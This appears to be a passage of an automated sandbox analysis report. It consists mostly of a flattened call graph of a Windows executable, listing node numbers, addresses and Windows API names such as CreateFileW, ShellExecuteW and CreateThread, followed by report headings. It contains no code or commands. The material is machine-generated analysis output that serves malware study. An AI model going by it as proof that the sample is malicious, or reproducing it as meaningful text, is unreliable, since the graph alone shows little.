98091 d9d81e 98090->98091 98092 d3a961 22 API calls 98091->98092 98093 d9d826 98092->98093 98094 d3a961 22 API calls 98093->98094 98095 d9d82e 98094->98095 98096 d3a961 22 API calls 98095->98096 98097 d9d836 98096->98097 98098 d3525f 22 API calls 98097->98098 98099 d9d84d 98098->98099 98100 d3525f 22 API calls 98099->98100 98101 d9d866 98100->98101 98102 d34c6d 22 API calls 98101->98102 98103 d9d872 98102->98103 98104 d9d885 98103->98104 98105 d393b2 22 API calls 98103->98105 98106 d34c6d 22 API calls 98104->98106 98105->98104 98107 d9d88e 98106->98107 98108 d9d89e 98107->98108 98109 d393b2 22 API calls 98107->98109 98110 d9d8b0 98108->98110 98111 d3a8c7 22 API calls 98108->98111 98109->98108 98112 d36350 22 API calls 98110->98112 98111->98110 98113 d9d8bb 98112->98113 98189 d9d978 22 API calls 98113->98189 98115 d9d8ca 98190 d9d978 22 API calls 98115->98190 98117 d9d8dd 98118 d34c6d 22 API calls 98117->98118 98119 d9d8e7 98118->98119 98120 d9d8ec 98119->98120 98121 d9d8fe 98119->98121 98122 d333c6 22 API calls 98120->98122 98123 d34c6d 22 API calls 98121->98123 98124 d9d8f9 98122->98124 98125 d9d907 98123->98125 98128 d36350 22 API calls 98124->98128 98126 d9d925 98125->98126 98127 d333c6 22 API calls 98125->98127 98129 d36350 22 API calls 98126->98129 98127->98124 98128->98126 98129->98083 98131 da2954 __wsopen_s 98130->98131 98132 d4fe0b 22 API calls 98131->98132 98133 da2971 98132->98133 98134 d35722 22 API calls 98133->98134 98135 da297b 98134->98135 98136 da274e 27 API calls 98135->98136 98137 da2986 98136->98137 98138 d3511f 64 API calls 98137->98138 98139 da299b 98138->98139 98140 da29bf 98139->98140 98141 da2a6c 98139->98141 98142 da2e66 75 API calls 98140->98142 98143 da2e66 75 API calls 98141->98143 98144 da29c4 98142->98144 98145 da2a38 98143->98145 98151 da2a75 ISource 98144->98151 98195 d5d583 26 API calls 98144->98195 98147 d350f5 40 API calls 98145->98147 98145->98151 98148 da2a91 98147->98148 98149 d350f5 40 API calls 98148->98149 98150 da2aa1 98149->98150 98153 d350f5 40 API calls 98150->98153 98151->97824 98152 da29ed 98196 d5d583 26 API calls 98152->98196 98155 da2abc 98153->98155 98156 d350f5 40 API calls 98155->98156 98157 da2acc 98156->98157 98158 d350f5 40 API calls 98157->98158 98159 da2ae7 98158->98159 98160 d350f5 40 API calls 98159->98160 98161 da2af7 98160->98161 98162 d350f5 40 API calls 98161->98162 98163 da2b07 98162->98163 98164 d350f5 40 API calls 98163->98164 98165 da2b17 98164->98165 98191 da3017 GetTempPathW GetTempFileNameW 98165->98191 98167 da2b22 98168 d5e5eb 29 API calls 98167->98168 98179 da2b33 98168->98179 98169 da2bed 98172 d350f5 40 API calls 98172->98179 98179->98151 98179->98169 98179->98172 98180 d5dbb3 65 API calls 98179->98180 98180->98179 98185->97750 98186->97785 98187->97797 98188->98073 98189->98115 98190->98117 98191->98167 98195->98152 98196->98145 98197 d83f75 98208 d4ceb1 98197->98208 98199 d83f8b 98200 d84006 98199->98200 98275 d4e300 23 API calls 98199->98275 98217 d3bf40 98200->98217 98202 d83fe6 98205 d84052 98202->98205 98276 da1abf 22 API calls 98202->98276 98206 d84a88 98205->98206 98277 da359c 82 API calls __wsopen_s 98205->98277 98209 d4ced2 98208->98209 98210 d4cebf 98208->98210 98211 d4cf05 98209->98211 98212 d4ced7 98209->98212 98213 d3aceb 23 API calls 98210->98213 98215 d3aceb 23 API calls 98211->98215 98214 d4fddb 22 API calls 98212->98214 98216 d4cec9 98213->98216 98214->98216 98215->98216 98216->98199 98278 d3adf0 98217->98278 98219 d3bf9d 98220 d3bfa9 98219->98220 98221 d804b6 98219->98221 98223 d804c6 98220->98223 98224 d3c01e 98220->98224 98306 da359c 82 API calls __wsopen_s 98221->98306 98307 da359c 82 API calls __wsopen_s 98223->98307 98283 d3ac91 98224->98283 98227 d3c603 98227->98205 98229 d97120 22 API calls 98258 d3c039 ISource __fread_nolock 98229->98258 98230 d3c7da 98233 d4fe0b 22 API calls 98230->98233 98238 d3c808 __fread_nolock 98233->98238 98235 d804f5 98239 d8055a 98235->98239 98308 d4d217 236 API calls 98235->98308 98240 d4fe0b 22 API calls 98238->98240 98239->98227 98309 da359c 82 API calls __wsopen_s 98239->98309 98245 d3c350 ISource __fread_nolock 98240->98245 98241 d3af8a 22 API calls 98241->98258 98242 d8091a 98318 da3209 23 API calls 98242->98318 98259 d3c3ac 98245->98259 98305 d4ce17 22 API calls ISource 98245->98305 98246 d3ec40 236 API calls 98246->98258 98247 d808a5 98248 d3ec40 236 API calls 98247->98248 98249 d808cf 98248->98249 98249->98227 98316 d3a81b 41 API calls 98249->98316 98251 d80591 98310 da359c 82 API calls __wsopen_s 98251->98310 98255 d808f6 98317 da359c 82 API calls __wsopen_s 98255->98317 98256 d3bbe0 40 API calls 98256->98258 98258->98227 98258->98229 98258->98230 98258->98235 98258->98238 98258->98239 98258->98241 98258->98242 98258->98246 98258->98247 98258->98251 98258->98255 98258->98256 98260 d4fddb 22 API calls 98258->98260 98261 d3c237 98258->98261 98262 d3aceb 23 API calls 98258->98262 98270 d809bf 98258->98270 98274 d4fe0b 22 API calls 98258->98274 98287 d3ad81 98258->98287 98311 d97099 22 API calls __fread_nolock 98258->98311 98312 db5745 54 API calls _wcslen 98258->98312 98313 d4aa42 22 API calls ISource 98258->98313 98314 d9f05c 40 API calls 98258->98314 98315 d3a993 41 API calls 98258->98315 98259->98205 98260->98258 98263 d3a8c7 22 API calls 98261->98263 98264 d3c253 98261->98264 98262->98258 98263->98264 98265 d80976 98264->98265 98268 d3c297 ISource 98264->98268 98267 d3aceb 23 API calls 98265->98267 98267->98270 98269 d3aceb 23 API calls 98268->98269 98268->98270 98271 d3c335 98269->98271 98270->98227 98319 da359c 82 API calls __wsopen_s 98270->98319 98271->98270 98272 d3c342 98271->98272 98294 d3a704 98272->98294 98274->98258 98275->98202 98276->98200 98277->98206 98279 d3ae01 98278->98279 98282 d3ae1c ISource 98278->98282 98280 d3aec9 22 API calls 98279->98280 98281 d3ae09 CharUpperBuffW 98280->98281 98281->98282 98282->98219 98284 d3acae 98283->98284 98285 d3acd1 98284->98285 98320 da359c 82 API calls __wsopen_s 98284->98320 98285->98258 98288 d3ad92 98287->98288 98289 d7fadb 98287->98289 98290 d4fddb 22 API calls 98288->98290 98291 d3ad99 98290->98291 98321 d3adcd 98291->98321 98295 d7f86f 98294->98295 98298 d3a718 98294->98298 98296 d7f87f 98295->98296 98337 d94d4a 22 API calls ISource 98295->98337 98299 d3a746 98298->98299 98300 d3af8a 22 API calls 98298->98300 98304 d3a763 ISource 98298->98304 98301 d3a74c 98299->98301 98328 d3af8a 98299->98328 98300->98299 98301->98304 98336 d3b090 22 API calls ISource 98301->98336 98304->98245 98305->98245 98306->98223 98307->98227 98308->98239 98309->98227 98310->98227 98311->98258 98312->98258 98313->98258 98314->98258 98315->98258 98316->98255 98317->98227 98318->98261 98319->98227 98320->98285 98324 d3addd 98321->98324 98322 d3adb6 98322->98258 98323 d4fddb 22 API calls 98323->98324 98324->98322 98324->98323 98325 d3a961 22 API calls 98324->98325 98326 d3a8c7 22 API calls 98324->98326 98327 d3adcd 22 API calls 98324->98327 98325->98324 98326->98324 98327->98324 98329 d3af98 98328->98329 98334 d3afc0 ISource 98328->98334 98330 d3afa6 98329->98330 98331 d3af8a 22 API calls 98329->98331 98332 d3afac 98330->98332 98333 d3af8a 22 API calls 98330->98333 98331->98330 98332->98334 98338 d3b090 22 API calls ISource 98332->98338 98333->98332 98334->98301 98336->98304 98337->98296 98338->98334 98339 d503fb 98340 d50407 BuildCatchObjectHelperInternal 98339->98340 98368 d4feb1 98340->98368 98342 d5040e 98343 d50561 98342->98343 98346 d50438 98342->98346 98395 d5083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98343->98395 98345 d50568 98396 d54e52 28 API calls _abort 98345->98396 98357 d50477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98346->98357 98379 d6247d 98346->98379 98348 d5056e 98397 d54e04 28 API calls _abort 98348->98397 98352 d50576 98353 d50457 98356 d504de 98360 d504f3 98356->98360 98359 d504d8 98357->98359 98391 d54e1a 38 API calls 2 library calls 98357->98391 98387 d50959 98359->98387 98392 d50992 GetModuleHandleW 98360->98392 98362 d504fa 98362->98345 98363 d504fe 98362->98363 98364 d50507 98363->98364 98393 d54df5 28 API calls _abort 98363->98393 98394 d50040 13 API calls 2 library calls 98364->98394 98367 d5050f 98367->98353 98369 d4feba 98368->98369 98398 d50698 IsProcessorFeaturePresent 98369->98398 98371 d4fec6 98399 d52c94 10 API calls 3 library calls 98371->98399 98373 d4fecb 98374 d4fecf 98373->98374 98400 d62317 98373->98400 98374->98342 98377 d4fee6 98377->98342 98380 d62494 98379->98380 98381 d50a8c CatchGuardHandler 5 API calls 98380->98381 98382 d50451 98381->98382 98382->98353 98383 d62421 98382->98383 98384 d62450 98383->98384 98385 d50a8c CatchGuardHandler 5 API calls 98384->98385 98386 d62479 98385->98386 98386->98357 98451 d52340 98387->98451 98390 d5097f 98390->98356 98391->98359 98392->98362 98393->98364 98394->98367 98395->98345 98396->98348 98397->98352 98398->98371 98399->98373 98404 d6d1f6 98400->98404 98403 d52cbd 8 API calls 3 library calls 98403->98374 98405 d6d213 98404->98405 98408 d6d20f 98404->98408 98405->98408 98410 d64bfb 98405->98410 98406 d50a8c CatchGuardHandler 5 API calls 98407 d4fed8 98406->98407 98407->98377 98407->98403 98408->98406 98411 d64c07 BuildCatchObjectHelperInternal 98410->98411 98422 d62f5e EnterCriticalSection 98411->98422 98413 d64c0e 98423 d650af 98413->98423 98415 d64c1d 98416 d64c2c 98415->98416 98436 d64a8f 29 API calls 98415->98436 98438 d64c48 LeaveCriticalSection _abort 98416->98438 98419 d64c27 98437 d64b45 GetStdHandle GetFileType 98419->98437 98420 d64c3d __wsopen_s 98420->98405 98422->98413 98424 d650bb BuildCatchObjectHelperInternal 98423->98424 98425 d650df 98424->98425 98426 d650c8 98424->98426 98439 d62f5e EnterCriticalSection 98425->98439 98447 d5f2d9 20 API calls _abort 98426->98447 98429 d650cd 98448 d627ec 26 API calls __wsopen_s 98429->98448 98431 d650d7 __wsopen_s 98431->98415 98432 d65117 98449 d6513e LeaveCriticalSection _abort 98432->98449 98433 d650eb 98433->98432 98440 d65000 98433->98440 98436->98419 98437->98416 98438->98420 98439->98433 98441 d64c7d pre_c_initialization 20 API calls 98440->98441 98444 d65012 98441->98444 98442 d6501f 98443 d629c8 _free 20 API calls 98442->98443 98446 d65071 98443->98446 98444->98442 98450 d63405 11 API calls 2 library calls 98444->98450 98446->98433 98447->98429 98448->98431 98449->98431 98450->98444 98452 d5096c GetStartupInfoW 98451->98452 98452->98390 98453 d3dddc 98454 d3b710 236 API calls 98453->98454 98455 d3ddea 98454->98455 98456 d32de3 98457 d32df0 __wsopen_s 98456->98457 98458 d32e09 98457->98458 98459 d72c2b ___scrt_fastfail 98457->98459 98460 d33aa2 23 API calls 98458->98460 98461 d72c47 GetOpenFileNameW 98459->98461 98462 d32e12 98460->98462 98463 d72c96 98461->98463 98472 d32da5 98462->98472 98465 d36b57 22 API calls 98463->98465 98467 d72cab 98465->98467 98467->98467 98469 d32e27 98490 d344a8 98469->98490 98473 d71f50 __wsopen_s 98472->98473 98474 d32db2 GetLongPathNameW 98473->98474 98475 d36b57 22 API calls 98474->98475 98476 d32dda 98475->98476 98477 d33598 98476->98477 98478 d3a961 22 API calls 98477->98478 98479 d335aa 98478->98479 98480 d33aa2 23 API calls 98479->98480 98481 d335b5 98480->98481 98482 d335c0 98481->98482 98483 d732eb 98481->98483 98485 d3515f 22 API calls 98482->98485 98487 d7330d 98483->98487 98525 d4ce60 41 API calls 98483->98525 98486 d335cc 98485->98486 98519 d335f3 98486->98519 98489 d335df 98489->98469 98491 d34ecb 94 API calls 98490->98491 98492 d344cd 98491->98492 98493 d73833 98492->98493 98494 d34ecb 94 API calls 98492->98494 98495 da2cf9 80 API calls 98493->98495 98496 d344e1 98494->98496 98497 d73848 98495->98497 98496->98493 98498 d344e9 98496->98498 98499 d7384c 98497->98499 98500 d73869 98497->98500 98503 d73854 98498->98503 98504 d344f5 98498->98504 98501 d34f39 68 API calls 98499->98501 98502 d4fe0b 22 API calls 98500->98502 98501->98503 98509 d738ae 98502->98509 98527 d9da5a 82 API calls 98503->98527 98526 d3940c 136 API calls 2 library calls 98504->98526 98507 d73862 98507->98500 98508 d32e31 98511 d73a5f 98509->98511 98512 d3a4a1 22 API calls 98509->98512 98516 d39cb3 22 API calls 98509->98516 98528 d9967e 22 API calls __fread_nolock 98509->98528 98529 d995ad 42 API calls _wcslen 98509->98529 98530 da0b5a 22 API calls 98509->98530 98531 d33ff7 22 API calls 98509->98531 98510 d34f39 68 API calls 98510->98511 98511->98510 98532 d9989b 82 API calls __wsopen_s 98511->98532 98512->98509 98516->98509 98520 d33605 98519->98520 98524 d33624 __fread_nolock 98519->98524 98523 d4fe0b 22 API calls 98520->98523 98521 d4fddb 22 API calls 98522 d3363b 98521->98522 98522->98489 98523->98524 98524->98521 98525->98483 98526->98508 98527->98507 98528->98509 98529->98509 98530->98509 98531->98509 98532->98511 98533 d72ba5 98534 d32b25 98533->98534 98535 d72baf 98533->98535 98561 d32b83 7 API calls 98534->98561 98537 d33a5a 24 API calls 98535->98537 98539 d72bb8 98537->98539 98541 d39cb3 22 API calls 98539->98541 98543 d72bc6 98541->98543 98542 d32b2f 98547 d33837 49 API calls 98542->98547 98552 d32b44 98542->98552 98544 d72bf5 98543->98544 98545 d72bce 98543->98545 98546 d333c6 22 API calls 98544->98546 98548 d333c6 22 API calls 98545->98548 98549 d72bf1 GetForegroundWindow ShellExecuteW 98546->98549 98547->98552 98550 d72bd9 98548->98550 98555 d72c26 98549->98555 98554 d36350 22 API calls 98550->98554 98553 d32b5f 98552->98553 98565 d330f2 Shell_NotifyIconW ___scrt_fastfail 98552->98565 98559 d32b66 SetCurrentDirectoryW 98553->98559 98557 d72be7 98554->98557 98555->98553 98558 d333c6 22 API calls 98557->98558 98558->98549 98560 d32b7a 98559->98560 98566 d32cd4 7 API calls 98561->98566 98563 d32b2a 98564 d32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98563->98564 98564->98542 98565->98553 98566->98563 98567 d68402 98572 d681be 98567->98572 98570 d6842a 98577 d681ef try_get_first_available_module 98572->98577 98574 d683ee 98591 d627ec 26 API calls __wsopen_s 98574->98591 98576 d68343 98576->98570 98584 d70984 98576->98584 98580 d68338 98577->98580 98587 d58e0b 40 API calls 2 library calls 98577->98587 98579 d6838c 98579->98580 98588 d58e0b 40 API calls 2 library calls 98579->98588 98580->98576 98590 d5f2d9 20 API calls _abort 98580->98590 98582 d683ab 98582->98580 98589 d58e0b 40 API calls 2 library calls 98582->98589 98592 d70081 98584->98592 98586 d7099f 98586->98570 98587->98579 98588->98582 98589->98580 98590->98574 98591->98576 98593 d7008d BuildCatchObjectHelperInternal 98592->98593 98594 d7009b 98593->98594 98597 d700d4 98593->98597 98650 d5f2d9 20 API calls _abort 98594->98650 98596 d700a0 98651 d627ec 26 API calls __wsopen_s 98596->98651 98603 d7065b 98597->98603 98602 d700aa __wsopen_s 98602->98586 98653 d7042f 98603->98653 98606 d706a6 98671 d65221 98606->98671 98607 d7068d 98685 d5f2c6 20 API calls _abort 98607->98685 98610 d70692 98686 d5f2d9 20 API calls _abort 98610->98686 98611 d706ab 98612 d706b4 98611->98612 98613 d706cb 98611->98613 98687 d5f2c6 20 API calls _abort 98612->98687 98684 d7039a CreateFileW 98613->98684 98617 d700f8 98652 d70121 LeaveCriticalSection __wsopen_s 98617->98652 98618 d706b9 98688 d5f2d9 20 API calls _abort 98618->98688 98619 d70781 GetFileType 98622 d707d3 98619->98622 98623 d7078c GetLastError 98619->98623 98621 d70756 GetLastError 98690 d5f2a3 20 API calls 2 library calls 98621->98690 98693 d6516a 21 API calls 3 library calls 98622->98693 98691 d5f2a3 20 API calls 2 library calls 98623->98691 98624 d70704 98624->98619 98624->98621 98689 d7039a CreateFileW 98624->98689 98628 d7079a CloseHandle 98628->98610 98629 d707c3 98628->98629 98692 d5f2d9 20 API calls _abort 98629->98692 98631 d70749 98631->98619 98631->98621 98633 d707f4 98635 d70840 98633->98635 98694 d705ab 72 API calls 4 library calls 98633->98694 98634 d707c8 98634->98610 98640 d7086d 98635->98640 98695 d7014d 72 API calls 4 library calls 98635->98695 98638 d70866 98639 d7087e 98638->98639 98638->98640 98639->98617 98642 d708fc CloseHandle 98639->98642 98641 d686ae __wsopen_s 29 API calls 98640->98641 98641->98617 98696 d7039a CreateFileW 98642->98696 98644 d70927 98645 d7095d 98644->98645 98646 d70931 GetLastError 98644->98646 98645->98617 98697 d5f2a3 20 API calls 2 library calls 98646->98697 98648 d7093d 98698 d65333 21 API calls 3 library calls 98648->98698 98650->98596 98651->98602 98652->98602 98654 d7046a 98653->98654 98655 d70450 98653->98655 98699 d703bf 98654->98699 98655->98654 98706 d5f2d9 20 API calls _abort 98655->98706 98658 d7045f 98707 d627ec 26 API calls __wsopen_s 98658->98707 98660 d704a2 98661 d704d1 98660->98661 98708 d5f2d9 20 API calls _abort 98660->98708 98669 d70524 98661->98669 98710 d5d70d 26 API calls 2 library calls 98661->98710 98664 d7051f 98666 d7059e 98664->98666 98664->98669 98665 d704c6 98709 d627ec 26 API calls __wsopen_s 98665->98709 98711 d627fc 11 API calls _abort 98666->98711 98669->98606 98669->98607 98670 d705aa 98672 d6522d BuildCatchObjectHelperInternal 98671->98672 98714 d62f5e EnterCriticalSection 98672->98714 98674 d65234 98675 d65259 98674->98675 98680 d652c7 EnterCriticalSection 98674->98680 98682 d6527b 98674->98682 98677 d65000 __wsopen_s 21 API calls 98675->98677 98678 d6525e 98677->98678 98678->98682 98718 d65147 EnterCriticalSection 98678->98718 98679 d652a4 __wsopen_s 98679->98611 98681 d652d4 LeaveCriticalSection 98680->98681 98680->98682 98681->98674 98715 d6532a 98682->98715 98684->98624 98685->98610 98686->98617 98687->98618 98688->98610 98689->98631 98690->98610 98691->98628 98692->98634 98693->98633 98694->98635 98695->98638 98696->98644 98697->98648 98698->98645 98701 d703d7 98699->98701 98700 d703f2 98700->98660 98701->98700 98712 d5f2d9 20 API calls _abort 98701->98712 98703 d70416 98713 d627ec 26 API calls __wsopen_s 98703->98713 98705 d70421 98705->98660 98706->98658 98707->98654 98708->98665 98709->98661 98710->98664 98711->98670 98712->98703 98713->98705 98714->98674 98719 d62fa6 LeaveCriticalSection 98715->98719 98717 d65331 98717->98679 98718->98682 98719->98717 98720 d31044 98725 d310f3 98720->98725 98722 d3104a 98761 d500a3 29 API calls __onexit 98722->98761 98724 d31054 98762 d31398 98725->98762 98729 d3116a 98730 d3a961 22 API calls 98729->98730 98731 d31174 98730->98731 98732 d3a961 22 API calls 98731->98732 98733 d3117e 98732->98733 98734 d3a961 22 API calls 98733->98734 98735 d31188 98734->98735 98736 d3a961 22 API calls 98735->98736 98737 d311c6 98736->98737 98738 d3a961 22 API calls 98737->98738 98739 d31292 98738->98739 98772 d3171c 98739->98772 98743 d312c4 98744 d3a961 22 API calls 98743->98744 98745 d312ce 98744->98745 98746 d41940 9 API calls 98745->98746 98747 d312f9 98746->98747 98793 d31aab 98747->98793 98749 d31315 98750 d31325 GetStdHandle 98749->98750 98751 d72485 98750->98751 98752 d3137a 98750->98752 98751->98752 98753 d7248e 98751->98753 98755 d31387 OleInitialize 98752->98755 98754 d4fddb 22 API calls 98753->98754 98756 d72495 98754->98756 98755->98722 98800 da011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98756->98800 98758 d7249e 98801 da0944 CreateThread 98758->98801 98760 d724aa CloseHandle 98760->98752 98761->98724 98802 d313f1 98762->98802 98765 d313f1 22 API calls 98766 d313d0 98765->98766 98767 d3a961 22 API calls 98766->98767 98768 d313dc 98767->98768 98769 d36b57 22 API calls 98768->98769 98770 d31129 98769->98770 98771 d31bc3 6 API calls 98770->98771 98771->98729 98773 d3a961 22 API calls 98772->98773 98774 d3172c 98773->98774 98775 d3a961 22 API calls 98774->98775 98776 d31734 98775->98776 98777 d3a961 22 API calls 98776->98777 98778 d3174f 98777->98778 98779 d4fddb 22 API calls 98778->98779 98780 d3129c 98779->98780 98781 d31b4a 98780->98781 98782 d31b58 98781->98782 98783 d3a961 22 API calls 98782->98783 98784 d31b63 98783->98784 98785 d3a961 22 API calls 98784->98785 98786 d31b6e 98785->98786 98787 d3a961 22 API calls 98786->98787 98788 d31b79 98787->98788 98789 d3a961 22 API calls 98788->98789 98790 d31b84 98789->98790 98791 d4fddb 22 API calls 98790->98791 98792 d31b96 RegisterWindowMessageW 98791->98792 98792->98743 98794 d31abb 98793->98794 98795 d7272d 98793->98795 98797 d4fddb 22 API calls 98794->98797 98809 da3209 23 API calls 98795->98809 98798 d31ac3 98797->98798 98798->98749 98799 d72738 98800->98758 98801->98760 98810 da092a 28 API calls 98801->98810 98803 d3a961 22 API calls 98802->98803 98804 d313fc 98803->98804 98805 d3a961 22 API calls 98804->98805 98806 d31404 98805->98806 98807 d3a961 22 API calls 98806->98807 98808 d313c6 98807->98808 98808->98765 98809->98799 98811 d82a00 98825 d3d7b0 ISource 98811->98825 98812 d3db11 PeekMessageW 98812->98825 98813 d3d807 GetInputState 98813->98812 98813->98825 98815 d81cbe TranslateAcceleratorW 98815->98825 98816 d3da04 timeGetTime 98816->98825 98817 d3db73 TranslateMessage DispatchMessageW 98818 d3db8f PeekMessageW 98817->98818 98818->98825 98819 d3dbaf Sleep 98837 d3dbc0 98819->98837 98820 d82b74 Sleep 98820->98837 98821 d81dda timeGetTime 98878 d4e300 23 API calls 98821->98878 98822 d4e551 timeGetTime 98822->98837 98825->98812 98825->98813 98825->98815 98825->98816 98825->98817 98825->98818 98825->98819 98825->98820 98825->98821 98828 d3d9d5 98825->98828 98839 d3ec40 236 API calls 98825->98839 98840 d41310 236 API calls 98825->98840 98841 d3bf40 236 API calls 98825->98841 98843 d3dd50 98825->98843 98850 d3dfd0 98825->98850 98873 d4edf6 98825->98873 98879 da3a2a 23 API calls 98825->98879 98880 da359c 82 API calls __wsopen_s 98825->98880 98826 d82c0b GetExitCodeProcess 98829 d82c21 WaitForSingleObject 98826->98829 98830 d82c37 CloseHandle 98826->98830 98829->98825 98829->98830 98830->98837 98831 d82a31 98831->98828 98832 dc29bf GetForegroundWindow 98832->98837 98833 d82ca9 Sleep 98833->98825 98837->98822 98837->98825 98837->98826 98837->98828 98837->98831 98837->98832 98837->98833 98881 db5658 23 API calls 98837->98881 98882 d9e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98837->98882 98883 d9d4dc 47 API calls 98837->98883 98839->98825 98840->98825 98841->98825 98844 d3dd83 98843->98844 98845 d3dd6f 98843->98845 98885 da359c 82 API calls __wsopen_s 98844->98885 98884 d3d260 236 API calls 2 library calls 98845->98884 98848 d3dd7a 98848->98825 98849 d82f75 98849->98849 98852 d3e010 98850->98852 98851 d3ec40 236 API calls 98870 d3e0dc ISource 98851->98870 98852->98870 98888 d50242 5 API calls __Init_thread_wait 98852->98888 98855 d82fca 98857 d3a961 22 API calls 98855->98857 98855->98870 98856 d3a961 22 API calls 98856->98870 98859 d82fe4 98857->98859 98889 d500a3 29 API calls __onexit 98859->98889 98862 d82fee 98890 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98862->98890 98866 d3a8c7 22 API calls 98866->98870 98867 d3e3e1 98867->98825 98868 d404f0 22 API calls 98868->98870 98869 da359c 82 API calls 98869->98870 98870->98851 98870->98856 98870->98866 98870->98867 98870->98868 98870->98869 98886 d3a81b 41 API calls 98870->98886 98887 d4a308 236 API calls 98870->98887 98891 d50242 5 API calls __Init_thread_wait 98870->98891 98892 d500a3 29 API calls __onexit 98870->98892 98893 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98870->98893 98894 db47d4 236 API calls 98870->98894 98895 db68c1 236 API calls 98870->98895 98874 d4ee09 98873->98874 98876 d4ee12 98873->98876 98874->98825 98875 d4ee36 IsDialogMessageW 98875->98874 98875->98876 98876->98874 98876->98875 98877 d8efaf GetClassLongW 98876->98877 98877->98875 98877->98876 98878->98825 98879->98825 98880->98825 98881->98837 98882->98837 98883->98837 98884->98848 98885->98849 98886->98870 98887->98870 98888->98855 98889->98862 98890->98870 98891->98870 98892->98870 98893->98870 98894->98870 98895->98870 98896 d31cad SystemParametersInfoW 98897 d3ddac 98900 d3caf0 98897->98900 98899 d3ddb7 98901 d3cb69 98900->98901 98904 d3cf89 98900->98904 98902 d3cf73 98901->98902 98903 d3cb8c 98901->98903 98999 d4d336 40 API calls 98902->98999 98903->98904 98986 d3bbe0 98903->98986 99015 da359c 82 API calls __wsopen_s 98904->99015 98908 d80ee7 98908->98908 98909 d3cd88 98995 d3b567 39 API calls 98909->98995 98910 d3cba7 98910->98904 98910->98909 98911 d3cf10 98910->98911 98912 d3cbf6 98910->98912 98920 d80abf 98910->98920 98998 d3a81b 41 API calls 98911->98998 98914 d3cc07 98912->98914 98915 d80b1a 98912->98915 98918 d3ec40 236 API calls 98914->98918 98915->98904 98919 d3ec40 236 API calls 98915->98919 98933 d3cc1e 98918->98933 98922 d80b41 98919->98922 98920->98915 98968 d3ce8b 98920->98968 99000 db79b6 236 API calls 98920->99000 99001 d4a308 236 API calls 98920->99001 98924 d80b51 98922->98924 98925 d80bbe 98922->98925 98947 d80b63 98922->98947 98922->98968 98923 d3cde8 98931 d80daa 98923->98931 98937 d3cdfe 98923->98937 98943 d80e4c 98923->98943 98923->98968 98928 d3aceb 23 API calls 98924->98928 98929 d80bfb 98925->98929 98942 d80c0d 98925->98942 99002 d9b59b 22 API calls 98925->99002 98926 d3cc3a 98926->98904 98927 d3ec40 236 API calls 98926->98927 98953 d3cc82 98927->98953 98928->98929 99003 d39c6e 22 API calls 98929->99003 99010 db4523 240 API calls ___scrt_fastfail 98931->99010 98932 d80e4a 99014 d3289a 23 API calls 98932->99014 98933->98904 98933->98926 98935 d3a8c7 22 API calls 98933->98935 98933->98968 98935->98926 98937->98932 98937->98943 98996 d3b649 54 API calls 98937->98996 98939 d80bb9 98945 d3aceb 23 API calls 98939->98945 99004 db47d4 236 API calls 98942->99004 99012 db5705 23 API calls 98943->99012 98944 d80de7 98954 d80e35 98944->98954 98955 d80df5 98944->98955 98945->98924 98946 d3ce43 98946->98943 98948 d80e77 98946->98948 98997 d3b649 54 API calls 98946->98997 98947->98929 98950 d404f0 22 API calls 98947->98950 99013 d3b649 54 API calls 98948->99013 98956 d80ba8 98950->98956 98961 d3ec40 236 API calls 98953->98961 98953->98968 98969 d3ccb2 98953->98969 98959 d3aceb 23 API calls 98954->98959 99011 d39c6e 22 API calls 98955->99011 98956->98929 98960 d404f0 22 API calls 98956->98960 98957 d3ce5f 98957->98932 98957->98943 98965 d3ce84 98957->98965 98962 d80e3e 98959->98962 98960->98939 98963 d80cc3 98961->98963 98964 d3aceb 23 API calls 98962->98964 98967 d3aceb 23 API calls 98963->98967 98963->98968 98964->98932 98966 d4fddb 22 API calls 98965->98966 98966->98968 98967->98969 98968->98899 98972 d80d06 98969->98972 98975 d3ccf2 98969->98975 98970 d80d23 99007 d4ad9c 39 API calls 98970->99007 98971 d80d19 99006 d3b415 39 API calls 98971->99006 98972->98971 99005 d4ad9c 39 API calls 98972->99005 98975->98904 98975->98911 98975->98970 98977 d3cd2e 98975->98977 98977->98970 98978 d3cd45 98977->98978 98979 d3cd4a 98977->98979 98994 d3b415 39 API calls 98978->98994 98981 d3cd74 98979->98981 98982 d80d66 98979->98982 98981->98904 98981->98909 98983 d80d7a 98982->98983 99008 d4ad9c 39 API calls 98982->99008 99009 d3b415 39 API calls 98983->99009 98987 d3be27 98986->98987 98992 d3bbf3 98986->98992 98987->98910 98989 d3a961 22 API calls 98989->98992 98990 d3bc9d 98990->98910 98992->98989 98992->98990 99016 d50242 5 API calls __Init_thread_wait 98992->99016 99017 d500a3 29 API calls __onexit 98992->99017 99018 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98992->99018 98994->98979 98995->98923 98996->98946 98997->98957 98998->98909 98999->98904 99000->98920 99001->98920 99002->98939 99003->98942 99004->98933 99005->98971 99006->98970 99007->98979 99008->98983 99009->98904 99010->98944 99011->98968 99012->98948 99013->98932 99014->98968 99015->98908 99016->98992 99017->98992 99018->98992

                      Executed Functions

                      Function 00D342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
